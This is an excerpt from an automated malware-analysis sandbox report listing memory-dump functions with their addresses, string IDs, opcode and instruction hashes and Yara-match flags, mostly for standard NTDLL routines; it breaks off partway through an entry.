                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: 6325d5725407b6425ab8fb82ceb587102284250b8b229f63ffd35945d7a8bac4
                                                                      • Instruction ID: 8a975ddfc356dfd06568bbc6afa20e99d0d0a649cec3e02b62ea1ba2e0597d6a
                                                                      • Opcode Fuzzy Hash: 6325d5725407b6425ab8fb82ceb587102284250b8b229f63ffd35945d7a8bac4
                                                                      • Instruction Fuzzy Hash: 64615431A10666AFEB3ADF6CC980B7EBBB4EB44714F140669EA21972C1C7349940C782
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: fc347d59f82294355d54ba25e47162431cf0c8cd78f161ac981211307649ce12
                                                                      • Instruction ID: 9a0c94eb492aa3174313d0ccb619e38ca13a119e61727b914d33315a91629d9b
                                                                      • Opcode Fuzzy Hash: fc347d59f82294355d54ba25e47162431cf0c8cd78f161ac981211307649ce12
                                                                      • Instruction Fuzzy Hash: 8B51E1713243428FD725DF28D984B2BBBE9EBC4314F44092CFA9697290D770E805CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction ID: 51ffef1670676bcdd8b376b19e5bb6a0495725a7292eff8cf22bf4a2f20467df
                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction Fuzzy Hash: 4551AC71214711AFC321DF28C840A6BBBF8FF58714F008A2EFA9597690E7B4E944CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01253540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: dd12e74442ea2cc90778d0dba8a5e268cc89dbdda2275081c4a9bd70ba659c18
                                                                      • Instruction ID: b41fbd13b6d506b112ea2e810bb8c1cd37ef565e08d62d72250fc699a35b0f21
                                                                      • Opcode Fuzzy Hash: dd12e74442ea2cc90778d0dba8a5e268cc89dbdda2275081c4a9bd70ba659c18
                                                                      • Instruction Fuzzy Hash: 7A4145B2D1052D9FDB61DA50CC84FEEB77CAB54754F0045A5EB09A7240DB309E88CFA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction ID: 2ef2eb1a393f80fc4cfc935699b69487bb291e9902cef6f08fc4060ca547c507
                                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction Fuzzy Hash: AB3100326103066FE720DE29CD85F9B7BD9AB84B58F144228FB489B2C0D670E914CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01253884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: 013b312573fd906bb7f6c03de8a9401931edb04503fcfceb1c009b0836641eab
                                                                      • Instruction ID: 6d8fc57925d14082744a74832cbd8ae8ae84cfbc125ee50a4ce2cd16d6d32e27
                                                                      • Opcode Fuzzy Hash: 013b312573fd906bb7f6c03de8a9401931edb04503fcfceb1c009b0836641eab
                                                                      • Instruction Fuzzy Hash: EC31E3B291151AAFEB15DA59C985E7BFBB4FF80BA0F014169EE14A7290D7309E00C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 73f8c9cfdd6353a105509dc041e1397873b03bff536bbba2ed18cdc1abb726ad
                                                                      • Instruction ID: 950bbe3610131bcbbfbaf13397e7db065a5f38bdcbfae9b9655b7a942d5f0076
                                                                      • Opcode Fuzzy Hash: 73f8c9cfdd6353a105509dc041e1397873b03bff536bbba2ed18cdc1abb726ad
                                                                      • Instruction Fuzzy Hash: B231E9B15693099FC312DFA8C88196BBBE8FB95654F000A2EF58483291D734DD05CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: WindowsExcludedProcs
                                                                      • API String ID: 0-3583428290
                                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction ID: a9ba5ec4cff7eb41f69e267f8a510dce3d93968f973cff89ba09bdc93f9bf1ab
                                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction Fuzzy Hash: 862128BA501A19BBDF269A998944FABBBEDAF91A10F060065FE04CB200D730DD11C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011FF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx
                                                                      • API String ID: 0-89312691
                                                                      • Opcode ID: 0a5622495f5cc7832c26715f534556ebdab8c8952a426dc16d66433a255b1983
                                                                      • Instruction ID: 81d8c7f4842b1b8720a6e69defd7c44ca2a14f9e1a7cf2b9559a94b2a73241b5
                                                                      • Opcode Fuzzy Hash: 0a5622495f5cc7832c26715f534556ebdab8c8952a426dc16d66433a255b1983
                                                                      • Instruction Fuzzy Hash: F711E677304E438BE72C4E1D8494736F695AB85624F2A472EE761DB3A1DBF0D8038342
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01288DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Critical error detected %lx, xrefs: 01288E21
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Critical error detected %lx
                                                                      • API String ID: 0-802127002
                                                                      • Opcode ID: 430e59c9503e5870e93c71c9d2543301ef41f7ba3810abc343b79c425c21b505
                                                                      • Instruction ID: 603871bd8d30897232e3b749277dc0d05ba79e7c90f0bfa90b34971beec212a4
                                                                      • Opcode Fuzzy Hash: 430e59c9503e5870e93c71c9d2543301ef41f7ba3810abc343b79c425c21b505
                                                                      • Instruction Fuzzy Hash: 68115B71D25349EBDF29DFA885057EDBBB0BB14314F20825DE569AB2D2C7744601CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0126FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0126FF60
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                      • API String ID: 0-1911121157
                                                                      • Opcode ID: 59686bfd735779d06c5cdc1bef5c1ef2fde3b801922d05907b62ec23e062b357
                                                                      • Instruction ID: 7cf7201fe32a38c3c29aeb6eeece8611b99faa312325b60308873986dc62020f
                                                                      • Opcode Fuzzy Hash: 59686bfd735779d06c5cdc1bef5c1ef2fde3b801922d05907b62ec23e062b357
                                                                      • Instruction Fuzzy Hash: CE110471930145EFDF26DB54C989FAC7BB1FF04B04F148044E2045B1E1C7399980CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004162B1, Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A
                                                                      • API String ID: 0-3554254475
                                                                      • Opcode ID: c67b05065d3e6e41236aa262ab9c8abc984a9ac18acbd8721d7564452735a9ca
                                                                      • Instruction ID: 74e13e160383035cbeb5df080f7a97611b855e5b523b5793568c8809e5f59e15
                                                                      • Opcode Fuzzy Hash: c67b05065d3e6e41236aa262ab9c8abc984a9ac18acbd8721d7564452735a9ca
                                                                      • Instruction Fuzzy Hash: F5C08C07A0A08008D2018C0968403B1FF608383229E0821D6CD4CAB003C002C19882CC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A5BA5, Relevance: .6, Instructions: 592COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9846852527c12fec8fd2e4f2c12518ec11b7c0fdcc737ff90dbe1c1985b59321
                                                                      • Instruction ID: 4fa583be9955d4dd6749970199f6be27e151e500d9611a25cc292c92fb6affcd
                                                                      • Opcode Fuzzy Hash: 9846852527c12fec8fd2e4f2c12518ec11b7c0fdcc737ff90dbe1c1985b59321
                                                                      • Instruction Fuzzy Hash: 4642607592021ACFDB24CF68C840BAABBB1FF45704F5481AADA4DEB342D7749985CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011F4120, Relevance: .4, Instructions: 444COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93d7c2a2292258b29d038eaf658403e39edeedf5cca0cc98b8c26aec5d311496
                                                                      • Instruction ID: 8b021028e443417129883f2115934739e6eb11f80921083388426bf01661ac24
                                                                      • Opcode Fuzzy Hash: 93d7c2a2292258b29d038eaf658403e39edeedf5cca0cc98b8c26aec5d311496
                                                                      • Instruction Fuzzy Hash: 72F17D746182128FD728CF19C480A7BB7E1FF98714F05492EF69ACB691E734D885CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012020A0, Relevance: .4, Instructions: 420COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d0c95efa6e69d432f0d925728a17deae3aff7c6170057fb9f7fa963dd47e164b
                                                                      • Instruction ID: 69a3677075a530d6a10711e1159eac79c541f9c41ffdb359ee3f956c6f0186cf
                                                                      • Opcode Fuzzy Hash: d0c95efa6e69d432f0d925728a17deae3aff7c6170057fb9f7fa963dd47e164b
                                                                      • Instruction Fuzzy Hash: C4F1F635628342DFE72BCB2CC44476ABBE1AF85714F04861EEA959B3C2D774D841CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011ED5E0, Relevance: .4, Instructions: 353COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2dce6ba19b80eb5422b944f398f95364617f8325b493038e831de447b81c17d8
                                                                      • Instruction ID: bfb16199a5880ae331255c99ee60a4e532d918a437ba098971671f9ca415cea9
                                                                      • Opcode Fuzzy Hash: 2dce6ba19b80eb5422b944f398f95364617f8325b493038e831de447b81c17d8
                                                                      • Instruction Fuzzy Hash: C2E1C370A10B5A8FEF39CFA8D858B69B7F2BF85308F054199DA0957291D730AD81CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E849B, Relevance: .3, Instructions: 290COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 82deb76c405e82796c50cc9a2e77d125d9db00bdb0c899cf2735ff926b56a408
                                                                      • Instruction ID: 21e28a0c23e5fcebed7937a012671d7f74eba7024a53f91e2005a686a7e78f18
                                                                      • Opcode Fuzzy Hash: 82deb76c405e82796c50cc9a2e77d125d9db00bdb0c899cf2735ff926b56a408
                                                                      • Instruction Fuzzy Hash: 7BB13CB0E1060ADFDB19DFD9C988AADBBF5FF99304F104129E605AB245E770A941CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0120513A, Relevance: .3, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 155b18e6ef7254de2619b4c3f3db62a6ffeadf1054509902a20a35b2965086a4
                                                                      • Instruction ID: e045f539523a3ff81d23469b1c741631c2c2f82e528d7f9f3b9836aa0b5db854
                                                                      • Opcode Fuzzy Hash: 155b18e6ef7254de2619b4c3f3db62a6ffeadf1054509902a20a35b2965086a4
                                                                      • Instruction Fuzzy Hash: EAC112756183818FD359CF28C480A5AFBE1BF89304F144A6EFA998B392D771E945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012003E2, Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 568bb7c78cb784c894affd0aeaff4cb58fb53934a6c2a3b7c4262e64dc6d8b1e
                                                                      • Instruction ID: 3beee630bf0f61b52b80a8ff0a517dd5a6a5958a9279ff2f67cc964b0a86b097
                                                                      • Opcode Fuzzy Hash: 568bb7c78cb784c894affd0aeaff4cb58fb53934a6c2a3b7c4262e64dc6d8b1e
                                                                      • Instruction Fuzzy Hash: E9913731E206969FFB36AA6CD848BAD7BA0EB01754F050361FB50AB2D2D7749D00C789
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011DC600, Relevance: .2, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ab223915d6449f943366329d1c887bcff0ba763cd928f84868ea576d99b4193
                                                                      • Instruction ID: 5388abb472f73d6a10d4b1ac6b9113e8e43a07e3fda0b2146307631154dff932
                                                                      • Opcode Fuzzy Hash: 5ab223915d6449f943366329d1c887bcff0ba763cd928f84868ea576d99b4193
                                                                      • Instruction Fuzzy Hash: 328192756642428FDB2ACE58C881A7BB7E4EF84354F14481EEF659B341E330ED41CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0126B8D0, Relevance: .2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 441cd8f5c7fb21116d88c79187da43a002b115d7170f85300bce72c3ad92d5c5
                                                                      • Instruction ID: 5ed1d11109dcd8c8dfdd7484a2bc3e98d14367dfed0409731f6eaabb556235e5
                                                                      • Opcode Fuzzy Hash: 441cd8f5c7fb21116d88c79187da43a002b115d7170f85300bce72c3ad92d5c5
                                                                      • Instruction Fuzzy Hash: 2771F032260702AFEB32DF18C845F6ABBE9EB44724F144528E755C76E0EB71E980CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01256DC9, Relevance: .2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                      • Instruction ID: fef02e698ef614e2d37d16d410dc46ff48584a8295bb6e60a2b1d6e074bea49b
                                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                      • Instruction Fuzzy Hash: D5717F71A1021AEFCB14DFA8C984AEEBBB9FF48714F504169EA05A7250D734EA41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011D52A5, Relevance: .2, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91be34bd11077ffd25d447d68055b660575626d6caf657f0b0eb5179099abeda
                                                                      • Instruction ID: e03ae46c9e4b5ea38150efe3e73a7f7d41e5531a712c9d8211ba50aaca33b83a
                                                                      • Opcode Fuzzy Hash: 91be34bd11077ffd25d447d68055b660575626d6caf657f0b0eb5179099abeda
                                                                      • Instruction Fuzzy Hash: AC51F970255742ABC726EF68C848B27BBE5FFA0714F040A1EF68583651E770E844CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01202AE4, Relevance: .2, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24e90a08be2e2783494c9701cfe2c83e873ae2f49a71bde251af6a6c9b8c1031
                                                                      • Instruction ID: a6ff0dd8f1c2221a8a1d5fac16e7e0a5c012ffa75bf7b50411d073cdec7ac572
                                                                      • Opcode Fuzzy Hash: 24e90a08be2e2783494c9701cfe2c83e873ae2f49a71bde251af6a6c9b8c1031
                                                                      • Instruction Fuzzy Hash: 4B51E776A20515CFCB15CF1CC4886BDB7F1FB88700719865BE946AB396E730AA41C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0129AE44, Relevance: .2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05061f2b1a1b363d31d0d9e1a44885c679411f97d0574b14ff235727d3d9a68f
                                                                      • Instruction ID: 7f0702e419d5d50335a6183d8b2614ad96403f2a963dc0511a7f0735e6fb608e
                                                                      • Opcode Fuzzy Hash: 05061f2b1a1b363d31d0d9e1a44885c679411f97d0574b14ff235727d3d9a68f
                                                                      • Instruction Fuzzy Hash: 2341F3B17203129BDF26DA2DC895B3BBB99EF94620F044229FB56876D0DB75D801C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011FDBE9, Relevance: .1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8342e637fa6ef145cc8afc3e219753122c4a385fcfc9f6ce924030a1019a0eec
                                                                      • Instruction ID: 0a3121b6f74f9d8336dcf897f99ab5a04f25e3af3dc22e830d06933f1e775f92
                                                                      • Opcode Fuzzy Hash: 8342e637fa6ef145cc8afc3e219753122c4a385fcfc9f6ce924030a1019a0eec
                                                                      • Instruction Fuzzy Hash: 2051AE71A01616CFCF18CFA8D480BAEBBF1BB88314F21815ED659A7384DB30A944CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011EEF40, Relevance: .1, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                      • Instruction ID: e06af8cb7a7c2d6854b048b6ebc94b401d784378aaef5a3b6f56071f7b83a767
                                                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                      • Instruction Fuzzy Hash: E9511A30A05A46DFDB2DCF98C0887AEBFF2AF45314F1481A8D94553282D3755989C742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A740D, Relevance: .1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                      • Instruction ID: d8c7fa86f419e2704ef0c90acb2a8360843f7b268e27ac0cd0248761dfd23593
                                                                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                      • Instruction Fuzzy Hash: D2519D71610646EFDB16CF18D480A96BBB5FF45304F54C0BAEA089F212E372EA46CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01202990, Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: edb0fcd66132ef2f33c97c5ac6e35191463adfec8b7498f42a826d81a0a1cd79
                                                                      • Instruction ID: c94aa51c003fa4777d6a0aaf40b49f2d2f25a60b3166f49a61578b893030fa72
                                                                      • Opcode Fuzzy Hash: edb0fcd66132ef2f33c97c5ac6e35191463adfec8b7498f42a826d81a0a1cd79
                                                                      • Instruction Fuzzy Hash: 5151803192021ADFDF26CF58C884AEEBBB5FF18310F118216E90467291C7758D92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01204BAD, Relevance: .1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5391c80cb5f8bb0f820634247f6c2be88ac373656dcb603e5d2e8a5e0ca2d6ff
                                                                      • Instruction ID: 0d6488d2fe1e9204c4bb38cda499f8acbff6e0a5c87a74b9f63515f3eb54a2f7
                                                                      • Opcode Fuzzy Hash: 5391c80cb5f8bb0f820634247f6c2be88ac373656dcb603e5d2e8a5e0ca2d6ff
                                                                      • Instruction Fuzzy Hash: FE41D535A102699FDB29EF68C944BEA77F4EF55710F0141A9EA08AB281D774DE80CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01204D3B, Relevance: .1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5691893777342237d079e5c494452f83f765db77a15e6eeb6d5ccd385907c3d9
                                                                      • Instruction ID: e1aa9a0ab0357db1edf2afeff26da130acb7c73ccf1a09ec64379ad0d6a3a8db
                                                                      • Opcode Fuzzy Hash: 5691893777342237d079e5c494452f83f765db77a15e6eeb6d5ccd385907c3d9
                                                                      • Instruction Fuzzy Hash: 46411571A603599FEB36EF14CC84FA6B7B9EB15614F004199EB05972C2D7B0ED40CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011E8A0A, Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ce5f1af5eca972fdeccb050739c9f514ea7e0e4fadec1a856c0e05e833a4b58
                                                                      • Instruction ID: 45b1ebc362bef365f97a01f2ba3a9a62252bc9b8967155b83e6a47784ac76e45
                                                                      • Opcode Fuzzy Hash: 0ce5f1af5eca972fdeccb050739c9f514ea7e0e4fadec1a856c0e05e833a4b58
                                                                      • Instruction Fuzzy Hash: 7C4183B4A0062D9BDB28DF99D88CAA9B7F4FB94300F1145E9D919D7242E7709E80CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0129AA16, Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                      • Instruction ID: ca0a244f8b377928f7cfcd9df334b2aea5cedad2581454eaf51aca51db8c505d
                                                                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                      • Instruction Fuzzy Hash: AC310832F103166BEF158B6DCC65BBFFBBAEFA0210F054469E905A7291EA749D00C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0129FDE2, Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
